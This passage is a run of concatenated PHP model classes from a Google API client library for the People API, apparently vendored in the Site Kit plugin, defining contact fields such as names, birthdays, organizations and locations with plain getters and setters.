$metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\PersonMetadata::class; protected $metadataDataType = ''; protected $miscKeywordsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\MiscKeyword::class; protected $miscKeywordsDataType = 'array'; protected $namesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Name::class; protected $namesDataType = 'array'; protected $nicknamesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Nickname::class; protected $nicknamesDataType = 'array'; protected $occupationsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Occupation::class; protected $occupationsDataType = 'array'; protected $organizationsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Organization::class; protected $organizationsDataType = 'array'; protected $phoneNumbersType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\PhoneNumber::class; protected $phoneNumbersDataType = 'array'; protected $photosType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Photo::class; protected $photosDataType = 'array'; protected $relationsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Relation::class; protected $relationsDataType = 'array'; protected $relationshipInterestsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\RelationshipInterest::class; protected $relationshipInterestsDataType = 'array'; protected $relationshipStatusesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\RelationshipStatus::class; protected $relationshipStatusesDataType = 'array'; protected $residencesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Residence::class; protected $residencesDataType = 'array'; /** * @var string */ public $resourceName; protected $sipAddressesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\SipAddress::class; protected $sipAddressesDataType = 'array'; protected $skillsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Skill::class; protected $skillsDataType = 'array'; protected $taglinesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Tagline::class; protected $taglinesDataType = 'array'; protected $urlsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Url::class; protected $urlsDataType = 'array'; protected $userDefinedType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\UserDefined::class; protected $userDefinedDataType = 'array'; /** * @param Address[] */ public function setAddresses($addresses) { $this->addresses = $addresses; } /** * @return Address[] */ public function getAddresses() { return $this->addresses; } /** * @param string */ public function setAgeRange($ageRange) { $this->ageRange = $ageRange; } /** * @return string */ public function getAgeRange() { return $this->ageRange; } /** * @param AgeRangeType[] */ public function setAgeRanges($ageRanges) { $this->ageRanges = $ageRanges; } /** * @return AgeRangeType[] */ public function getAgeRanges() { return $this->ageRanges; } /** * @param Biography[] */ public function setBiographies($biographies) { $this->biographies = $biographies; } /** * @return Biography[] */ public function getBiographies() { return $this->biographies; } /** * @param Birthday[] */ public function setBirthdays($birthdays) { $this->birthdays = $birthdays; } /** * @return Birthday[] */ public function getBirthdays() { return $this->birthdays; } /** * @param BraggingRights[] */ public function setBraggingRights($braggingRights) { $this->braggingRights = $braggingRights; } /** * @return BraggingRights[] */ public function getBraggingRights() { return $this->braggingRights; } /** * @param CalendarUrl[] */ public function setCalendarUrls($calendarUrls) { $this->calendarUrls = $calendarUrls; } /** * @return CalendarUrl[] */ public function getCalendarUrls() { return $this->calendarUrls; } /** * @param ClientData[] */ public function setClientData($clientData) { $this->clientData = $clientData; } /** * @return ClientData[] */ public function getClientData() { return $this->clientData; } /** * @param CoverPhoto[] */ public function setCoverPhotos($coverPhotos) { $this->coverPhotos = $coverPhotos; } /** * @return CoverPhoto[] */ public function getCoverPhotos() { return $this->coverPhotos; } /** * @param EmailAddress[] */ public function setEmailAddresses($emailAddresses) { $this->emailAddresses = $emailAddresses; } /** * @return EmailAddress[] */ public function getEmailAddresses() { return $this->emailAddresses; } /** * @param string */ public function setEtag($etag) { $this->etag = $etag; } /** * @return string */ public function getEtag() { return $this->etag; } /** * @param Event[] */ public function setEvents($events) { $this->events = $events; } /** * @return Event[] */ public function getEvents() { return $this->events; } /** * @param ExternalId[] */ public function setExternalIds($externalIds) { $this->externalIds = $externalIds; } /** * @return ExternalId[] */ public function getExternalIds() { return $this->externalIds; } /** * @param FileAs[] */ public function setFileAses($fileAses) { $this->fileAses = $fileAses; } /** * @return FileAs[] */ public function getFileAses() { return $this->fileAses; } /** * @param Gender[] */ public function setGenders($genders) { $this->genders = $genders; } /** * @return Gender[] */ public function getGenders() { return $this->genders; } /** * @param ImClient[] */ public function setImClients($imClients) { $this->imClients = $imClients; } /** * @return ImClient[] */ public function getImClients() { return $this->imClients; } /** * @param Interest[] */ public function setInterests($interests) { $this->interests = $interests; } /** * @return Interest[] */ public function getInterests() { return $this->interests; } /** * @param Locale[] */ public function setLocales($locales) { $this->locales = $locales; } /** * @return Locale[] */ public function getLocales() { return $this->locales; } /** * @param Location[] */ public function setLocations($locations) { $this->locations = $locations; } /** * @return Location[] */ public function getLocations() { return $this->locations; } /** * @param Membership[] */ public function setMemberships($memberships) { $this->memberships = $memberships; } /** * @return Membership[] */ public function getMemberships() { return $this->memberships; } /** * @param PersonMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\PersonMetadata $metadata) { $this->metadata = $metadata; } /** * @return PersonMetadata */ public function getMetadata() { return $this->metadata; } /** * @param MiscKeyword[] */ public function setMiscKeywords($miscKeywords) { $this->miscKeywords = $miscKeywords; } /** * @return MiscKeyword[] */ public function getMiscKeywords() { return $this->miscKeywords; } /** * @param Name[] */ public function setNames($names) { $this->names = $names; } /** * @return Name[] */ public function getNames() { return $this->names; } /** * @param Nickname[] */ public function setNicknames($nicknames) { $this->nicknames = $nicknames; } /** * @return Nickname[] */ public function getNicknames() { return $this->nicknames; } /** * @param Occupation[] */ public function setOccupations($occupations) { $this->occupations = $occupations; } /** * @return Occupation[] */ public function getOccupations() { return $this->occupations; } /** * @param Organization[] */ public function setOrganizations($organizations) { $this->organizations = $organizations; } /** * @return Organization[] */ public function getOrganizations() { return $this->organizations; } /** * @param PhoneNumber[] */ public function setPhoneNumbers($phoneNumbers) { $this->phoneNumbers = $phoneNumbers; } /** * @return PhoneNumber[] */ public function getPhoneNumbers() { return $this->phoneNumbers; } /** * @param Photo[] */ public function setPhotos($photos) { $this->photos = $photos; } /** * @return Photo[] */ public function getPhotos() { return $this->photos; } /** * @param Relation[] */ public function setRelations($relations) { $this->relations = $relations; } /** * @return Relation[] */ public function getRelations() { return $this->relations; } /** * @param RelationshipInterest[] */ public function setRelationshipInterests($relationshipInterests) { $this->relationshipInterests = $relationshipInterests; } /** * @return RelationshipInterest[] */ public function getRelationshipInterests() { return $this->relationshipInterests; } /** * @param RelationshipStatus[] */ public function setRelationshipStatuses($relationshipStatuses) { $this->relationshipStatuses = $relationshipStatuses; } /** * @return RelationshipStatus[] */ public function getRelationshipStatuses() { return $this->relationshipStatuses; } /** * @param Residence[] */ public function setResidences($residences) { $this->residences = $residences; } /** * @return Residence[] */ public function getResidences() { return $this->residences; } /** * @param string */ public function setResourceName($resourceName) { $this->resourceName = $resourceName; } /** * @return string */ public function getResourceName() { return $this->resourceName; } /** * @param SipAddress[] */ public function setSipAddresses($sipAddresses) { $this->sipAddresses = $sipAddresses; } /** * @return SipAddress[] */ public function getSipAddresses() { return $this->sipAddresses; } /** * @param Skill[] */ public function setSkills($skills) { $this->skills = $skills; } /** * @return Skill[] */ public function getSkills() { return $this->skills; } /** * @param Tagline[] */ public function setTaglines($taglines) { $this->taglines = $taglines; } /** * @return Tagline[] */ public function getTaglines() { return $this->taglines; } /** * @param Url[] */ public function setUrls($urls) { $this->urls = $urls; } /** * @return Url[] */ public function getUrls() { return $this->urls; } /** * @param UserDefined[] */ public function setUserDefined($userDefined) { $this->userDefined = $userDefined; } /** * @return UserDefined[] */ public function getUserDefined() { return $this->userDefined; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Person'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Relation extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $person; /** * @var string */ public $type; /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setPerson($person) { $this->person = $person; } /** * @return string */ public function getPerson() { return $this->person; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Relation::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Relation'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class SearchResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'results'; protected $resultsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchResult::class; protected $resultsDataType = 'array'; /** * @param SearchResult[] */ public function setResults($results) { $this->results = $results; } /** * @return SearchResult[] */ public function getResults() { return $this->results; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_SearchResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Birthday extends \Google\Site_Kit_Dependencies\Google\Model { protected $dateType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date::class; protected $dateDataType = ''; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $text; /** * @param Date */ public function setDate(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date $date) { $this->date = $date; } /** * @return Date */ public function getDate() { return $this->date; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setText($text) { $this->text = $text; } /** * @return string */ public function getText() { return $this->text; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Birthday::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Birthday'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Organization extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $costCenter; /** * @var bool */ public $current; /** * @var string */ public $department; /** * @var string */ public $domain; protected $endDateType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date::class; protected $endDateDataType = ''; /** * @var string */ public $formattedType; /** * @var int */ public $fullTimeEquivalentMillipercent; /** * @var string */ public $jobDescription; /** * @var string */ public $location; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $name; /** * @var string */ public $phoneticName; protected $startDateType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date::class; protected $startDateDataType = ''; /** * @var string */ public $symbol; /** * @var string */ public $title; /** * @var string */ public $type; /** * @param string */ public function setCostCenter($costCenter) { $this->costCenter = $costCenter; } /** * @return string */ public function getCostCenter() { return $this->costCenter; } /** * @param bool */ public function setCurrent($current) { $this->current = $current; } /** * @return bool */ public function getCurrent() { return $this->current; } /** * @param string */ public function setDepartment($department) { $this->department = $department; } /** * @return string */ public function getDepartment() { return $this->department; } /** * @param string */ public function setDomain($domain) { $this->domain = $domain; } /** * @return string */ public function getDomain() { return $this->domain; } /** * @param Date */ public function setEndDate(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date $endDate) { $this->endDate = $endDate; } /** * @return Date */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param int */ public function setFullTimeEquivalentMillipercent($fullTimeEquivalentMillipercent) { $this->fullTimeEquivalentMillipercent = $fullTimeEquivalentMillipercent; } /** * @return int */ public function getFullTimeEquivalentMillipercent() { return $this->fullTimeEquivalentMillipercent; } /** * @param string */ public function setJobDescription($jobDescription) { $this->jobDescription = $jobDescription; } /** * @return string */ public function getJobDescription() { return $this->jobDescription; } /** * @param string */ public function setLocation($location) { $this->location = $location; } /** * @return string */ public function getLocation() { return $this->location; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPhoneticName($phoneticName) { $this->phoneticName = $phoneticName; } /** * @return string */ public function getPhoneticName() { return $this->phoneticName; } /** * @param Date */ public function setStartDate(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Date $startDate) { $this->startDate = $startDate; } /** * @return Date */ public function getStartDate() { return $this->startDate; } /** * @param string */ public function setSymbol($symbol) { $this->symbol = $symbol; } /** * @return string */ public function getSymbol() { return $this->symbol; } /** * @param string */ public function setTitle($title) { $this->title = $title; } /** * @return string */ public function getTitle() { return $this->title; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Organization::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Organization'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ListOtherContactsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'otherContacts'; /** * @var string */ public $nextPageToken; /** * @var string */ public $nextSyncToken; protected $otherContactsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $otherContactsDataType = 'array'; /** * @var int */ public $totalSize; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param string */ public function setNextSyncToken($nextSyncToken) { $this->nextSyncToken = $nextSyncToken; } /** * @return string */ public function getNextSyncToken() { return $this->nextSyncToken; } /** * @param Person[] */ public function setOtherContacts($otherContacts) { $this->otherContacts = $otherContacts; } /** * @return Person[] */ public function getOtherContacts() { return $this->otherContacts; } /** * @param int */ public function setTotalSize($totalSize) { $this->totalSize = $totalSize; } /** * @return int */ public function getTotalSize() { return $this->totalSize; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListOtherContactsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ListOtherContactsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class DeleteContactPhotoResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $personType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $personDataType = ''; /** * @param Person */ public function setPerson(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person $person) { $this->person = $person; } /** * @return Person */ public function getPerson() { return $this->person; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\DeleteContactPhotoResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_DeleteContactPhotoResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Status extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'details'; /** * @var int */ public $code; /** * @var array[] */ public $details; /** * @var string */ public $message; /** * @param int */ public function setCode($code) { $this->code = $code; } /** * @return int */ public function getCode() { return $this->code; } /** * @param array[] */ public function setDetails($details) { $this->details = $details; } /** * @return array[] */ public function getDetails() { return $this->details; } /** * @param string */ public function setMessage($message) { $this->message = $message; } /** * @return string */ public function getMessage() { return $this->message; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Status::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Status'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class DomainMembership extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $inViewerDomain; /** * @param bool */ public function setInViewerDomain($inViewerDomain) { $this->inViewerDomain = $inViewerDomain; } /** * @return bool */ public function getInViewerDomain() { return $this->inViewerDomain; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\DomainMembership::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_DomainMembership'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Locale extends \Google\Site_Kit_Dependencies\Google\Model { protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Locale::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Locale'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ListContactGroupsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'contactGroups'; protected $contactGroupsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup::class; protected $contactGroupsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @var string */ public $nextSyncToken; /** * @var int */ public $totalItems; /** * @param ContactGroup[] */ public function setContactGroups($contactGroups) { $this->contactGroups = $contactGroups; } /** * @return ContactGroup[] */ public function getContactGroups() { return $this->contactGroups; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param string */ public function setNextSyncToken($nextSyncToken) { $this->nextSyncToken = $nextSyncToken; } /** * @return string */ public function getNextSyncToken() { return $this->nextSyncToken; } /** * @param int */ public function setTotalItems($totalItems) { $this->totalItems = $totalItems; } /** * @return int */ public function getTotalItems() { return $this->totalItems; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListContactGroupsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ListContactGroupsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Location extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $buildingId; /** * @var bool */ public $current; /** * @var string */ public $deskCode; /** * @var string */ public $floor; /** * @var string */ public $floorSection; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param string */ public function setBuildingId($buildingId) { $this->buildingId = $buildingId; } /** * @return string */ public function getBuildingId() { return $this->buildingId; } /** * @param bool */ public function setCurrent($current) { $this->current = $current; } /** * @return bool */ public function getCurrent() { return $this->current; } /** * @param string */ public function setDeskCode($deskCode) { $this->deskCode = $deskCode; } /** * @return string */ public function getDeskCode() { return $this->deskCode; } /** * @param string */ public function setFloor($floor) { $this->floor = $floor; } /** * @return string */ public function getFloor() { return $this->floor; } /** * @param string */ public function setFloorSection($floorSection) { $this->floorSection = $floorSection; } /** * @return string */ public function getFloorSection() { return $this->floorSection; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Location::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Location'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ContactGroupResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $contactGroupType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup::class; protected $contactGroupDataType = ''; /** * @var string */ public $requestedResourceName; protected $statusType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Status::class; protected $statusDataType = ''; /** * @param ContactGroup */ public function setContactGroup(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup $contactGroup) { $this->contactGroup = $contactGroup; } /** * @return ContactGroup */ public function getContactGroup() { return $this->contactGroup; } /** * @param string */ public function setRequestedResourceName($requestedResourceName) { $this->requestedResourceName = $requestedResourceName; } /** * @return string */ public function getRequestedResourceName() { return $this->requestedResourceName; } /** * @param Status */ public function setStatus(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Status $status) { $this->status = $status; } /** * @return Status */ public function getStatus() { return $this->status; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroupResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ContactGroupResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ListConnectionsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'connections'; protected $connectionsType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $connectionsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @var string */ public $nextSyncToken; /** * @var int */ public $totalItems; /** * @var int */ public $totalPeople; /** * @param Person[] */ public function setConnections($connections) { $this->connections = $connections; } /** * @return Person[] */ public function getConnections() { return $this->connections; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param string */ public function setNextSyncToken($nextSyncToken) { $this->nextSyncToken = $nextSyncToken; } /** * @return string */ public function getNextSyncToken() { return $this->nextSyncToken; } /** * @param int */ public function setTotalItems($totalItems) { $this->totalItems = $totalItems; } /** * @return int */ public function getTotalItems() { return $this->totalItems; } /** * @param int */ public function setTotalPeople($totalPeople) { $this->totalPeople = $totalPeople; } /** * @return int */ public function getTotalPeople() { return $this->totalPeople; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListConnectionsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ListConnectionsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ExternalId extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return 